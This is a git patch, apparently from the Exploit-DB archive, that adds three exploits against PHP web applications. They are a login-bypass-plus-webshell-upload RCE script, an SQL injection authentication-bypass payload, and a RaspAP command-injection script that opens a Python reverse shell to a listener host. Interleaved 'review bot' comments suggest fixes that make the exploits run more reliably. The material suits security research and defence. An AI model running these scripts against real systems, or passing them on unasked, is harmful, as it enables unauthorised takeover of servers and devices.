From 1e25d5703078b60c56665d8f9f070ecba7413269 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 24 Aug 2021 05:01:53 +0000 Subject: [PATCH] DB: 2021-08-24 3 changes to exploits/shellcodes Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated) RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated) --- exploits/php/webapps/50221.py | 121 +++++++++++++++++++++++++++++++++ exploits/php/webapps/50223.txt | 25 +++++++ exploits/php/webapps/50224.py | 45 ++++++++++++ files_exploits.csv | 3 + 4 files changed, 194 insertions(+) create mode 100755 exploits/php/webapps/50221.py create mode 100644 exploits/php/webapps/50223.txt create mode 100755 exploits/php/webapps/50224.py diff --git a/exploits/php/webapps/50221.py b/exploits/php/webapps/50221.py new file mode 100755 index 000000000..c426e9bf9 --- /dev/null +++ b/exploits/php/webapps/50221.py 
@@ -0,0 +1,121 @@
+# Exploit Title: Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
+# Date: 20-08-2021
+# Exploit Author: Halit AKAYDIN (hLtAkydn)
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html
+# Version: V1
+# Category: Webapps
+# Tested on: Linux/Windows
+
+# Online Traffic Offense Management System
+# contains a file upload vulnerability that allows for remote
+# code execution against the target. This exploit requires
+# the user to be authenticated, but a SQL injection in the login form
+# allows the authentication controls to be bypassed
+# File uploaded from "/admin/?page=user" has no validation check
+# and the directory it is placed in allows for execution of PHP code.
+
+
+"""
+(hltakydn@SpaceSec)-[~/Exploits-db/traffic_offense]
+$ python2 exploit.py
+
+Example: http://example.com
+
+Url: http://trafficoffense.com
+
+[?] Check Adress
+
+[+] Bypass Login
+
+[+] Upload Shell
+
+[+] Exploit Done!
+
+$ whoami
+www-data
+
+$ id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+
+$ pwd
+/var/www/html/uploads
+
+$
+
+"""
+
+
+
+#!/usr/bin/env python2
+import requests
+import time
+from bs4 import BeautifulSoup
+
+print ("\nExample: http://example.com\n")
+
+url = raw_input("Url: ")
+payload_name = "evil.php"
+payload_file = "'; $cmd = ($_GET['cmd']); system($cmd); echo ''; die; } ?>"
+
+if url.startswith(('http://', 'https://')):
+ print "Check Url ...\n"
+else:
+ print "\n[?] 
Check Adress\n" + url = "http://" + url + +try: + response = requests.get(url) +except requests.ConnectionError as exception: + print("[-] Address not reachable") + sys.exit(1) + +session = requests.session() + +request_url = url + "/classes/Login.php?f=login" +post_data = {"username": "'' OR 1=1-- '", "password": "'' OR 1=1-- '"} +bypass_user = session.post(request_url, data=post_data) + + +if bypass_user.text == '{"status":"success"}': + print ("[+] Bypass Login\n") + cookies = session.cookies.get_dict() + req = session.get(url + "/admin/?page=user") + parser = BeautifulSoup(req.text, 'html.parser') + userid = parser.find('input', {'name':'id'}).get("value") + firstname = parser.find('input', {'id':'firstname'}).get("value") + lastname = parser.find('input', {'id':'lastname'}).get("value") + username = parser.find('input', {'id':'username'}).get("value") + + request_url = url + "/classes/Users.php?f=save" + headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "Accept": "*/*", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryxGKa5dhQCRwOodsq", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} + data = "------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n"+ userid +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\n"+ firstname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\n"+ lastname +"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n"+ username 
+"\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq\r\nContent-Disposition: form-data; name=\"img\"; filename=\""+ payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n" + payload_file +"\n\r\n------WebKitFormBoundaryxGKa5dhQCRwOodsq--\r\n" + upload = session.post(request_url, headers=headers, cookies=cookies, data=data) + time.sleep(2) + + if upload.text == "1": + print ("[+] Upload Shell\n") + time.sleep(2) + req = session.get(url + "/admin/?page=user") + parser = BeautifulSoup(req.text, 'html.parser') + find_shell = parser.find('img', {'id':'cimg'}) + print ("[+] Exploit Done!\n") + + while True: + cmd = raw_input("$ ") + headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36'} + request = requests.post(find_shell.get("src") + "?cmd=" + cmd, data={'key':'value'}, headers=headers) + print request.text.replace("
" ,"").replace("
", "") + time.sleep(1) + + elif upload.text == "2": + print ("[-] Try the manual method") + request_url = url + "/classes/Login.php?f=logout" + cookies = session.cookies.get_dict() + headers = {"sec-ch-ua": "\";Not A Brand\";v=\"99\", \"Chromium\";v=\"88\"", "sec-ch-ua-mobile": "?0", "Upgrade-Insecure-Requests": "1", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-User": "?1", "Sec-Fetch-Dest": "document", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} + session.get(request_url, headers=headers, cookies=cookies) + else: + print("[!]An unknown error") + +else: + print ("[-] Failed to bypass login panel") \ No newline at end of file diff --git a/exploits/php/webapps/50223.txt b/exploits/php/webapps/50223.txt new file mode 100644 index 000000000..b8bc3d0c0 --- /dev/null +++ b/exploits/php/webapps/50223.txt 
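Review bot: `sys.exit(1)` inside the `except requests.ConnectionError` handler references a module the script never imports (only `requests`, `time` and `bs4` are imported), so an unreachable target dies with a NameError instead of the intended "[-] Address not reachable" message; add `import sys` next to the other imports. The command loop builds the webshell URL by concatenation, `find_shell.get("src") + "?cmd=" + cmd`, so any command containing a space, `&` or `#` is mangled before it reaches the shell — pass it as `params={"cmd": cmd}` and let requests encode it, and guard `find_shell` against `None`, which `parser.find` returns when no `img#cimg` element is present. The `#!/usr/bin/env python2` line sits after the module docstring, where the kernel will not honour it. The `payload_file` literal and the block indentation look truncated in this rendering (no PHP open tag is visible), so the upload body here may not match the original file.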
@@ -0,0 +1,25 @@
+# Exploit Title: Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)
+# Date: 21/08/2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/13011/phone-bookphone-directory.html
+# Version: 1.0
+# Testeted on: Linux (Ubuntu 20.04) using LAMPP
+
+## SQL Injection
+
+# Vulnerable page
+http://localhost/PhoneBook/index.php
+
+# Vulnerable paramater
+username1 & password
+
+# POC
+Username = ' or sleep(5)='-- -
+Password = ' '
+
+Using these to login will have the webapp sleep for 5 seconds, then you will be logged in as "' or sleep(5)='-- -"
+
+# Vulnerable Code
+index.php line 13
+$sql = mysqli_query($dbcon,"SELECT * FROM userdetails WHERE username = '$username' AND password = '$password'");
\ No newline at end of file
diff --git a/exploits/php/webapps/50224.py b/exploits/php/webapps/50224.py
new file mode 100644
index 000000000..c1fc1a76e
--- /dev/null
+++ b/exploits/php/webapps/50224.py
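Review bot: The PoC payload `' or sleep(5)='-- -` is an authentication bypass rather than only a 'Username' injection: with both `$username` and `$password` interpolated into the query quoted at index.php line 13, the `-- -` comment strips the password predicate and the remaining `'' or sleep(5)=''` predicate is true in MySQL (sleep returns 0, which compares equal to an empty string), so the query matches rows regardless of credentials. The advisory should say so, and should name the fix: a prepared statement such as `$stmt = $dbcon->prepare("SELECT * FROM userdetails WHERE username = ?"); $stmt->bind_param("s", $username);` together with a `password_verify()` check instead of comparing plaintext passwords inside the SQL. Two typos in the headers, "Testeted" and "paramater", should be corrected.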
@@ -0,0 +1,45 @@
+# Exploit Title: RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)
+# Date: 23.08.2021
+# Exploit Author: Moritz Gruber
+# Vendor Homepage: https://raspap.com/
+# Software Link: https://github.com/RaspAP/raspap-webgui
+# Version: 2.6.6
+# Tested on: Linux raspberrypi 5.10.52-v7+
+
+import requests
+from requests.api import post
+from requests.auth import HTTPBasicAuth
+from bs4 import BeautifulSoup
+import sys, re
+
+if len(sys.argv) != 7:
+ print("python3 exec-raspap.py ")
+ sys.exit()
+else:
+ target_host = sys.argv[1]
+ target_port = sys.argv[2]
+ username = sys.argv[3]
+ password = sys.argv[4]
+ listener_host = sys.argv[5]
+ listener_port = sys.argv[6]
+
+ endpoint = "/wpa_conf"
+ exploit = f"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{listener_host}\",{listener_port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
+ url = "http://{}:{}/{}".format(target_host,target_port,endpoint)
+
+ s = requests.Session()
+
+ get_Request = s.get(url, auth=HTTPBasicAuth(username, password))
+ soup = BeautifulSoup(get_Request.text, "lxml")
+ csrf_token = soup.find("meta",{"name":"csrf_token"}).get("content")
+
+ post_data = {
+ "csrf_token": csrf_token,
+ "connect": "wlan; {}".format(exploit)
+ }
+ post_Request = s.post(url, data=post_data, auth=HTTPBasicAuth(username, password))
+ if post_Request.status_code:
+ print("Exploit send.")
+ else:
+ print("Something went wrong.")
+ print("Done")
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 19b801440..6ef3cd286 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
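Review bot: `if post_Request.status_code:` is always true, because every HTTP response carries a non-zero status code, so "Exploit send." is printed even when the server answers 401 or 500; use `if post_Request.ok:` (or compare to `200`). Earlier, `soup.find("meta",{"name":"csrf_token"})` returns `None` when the basic-auth credentials are rejected or the page layout differs, and the chained `.get("content")` then raises AttributeError — check `get_Request.status_code` and the `find` result before building `post_data`. `from requests.api import post` and `re` are unused, and `BeautifulSoup(..., "lxml")` needs the lxml package, which the header does not mention as a dependency. The usage string and the indentation appear truncated in this rendering (the argv placeholders are missing), so those may be artefacts rather than defects in the original file.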
@@ -44347,3 +44347,6 @@ id,file,description,date,author,type,platform,port
 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",2021-08-18,"Halit AKAYDIN",webapps,php,
 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",2021-08-19,"Davide Taraschi",webapps,php,
 50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",2021-08-20,"Azumah Foresight Xorlali",webapps,php,
+50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",2021-08-23,"Halit AKAYDIN",webapps,php,
+50223,exploits/php/webapps/50223.txt,"Simple Phone book/directory 1.0 - 'Username' SQL Injection (Unauthenticated)",2021-08-23,"Justin White",webapps,php,
+50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",2021-08-23,"Moritz Gruber",webapps,php,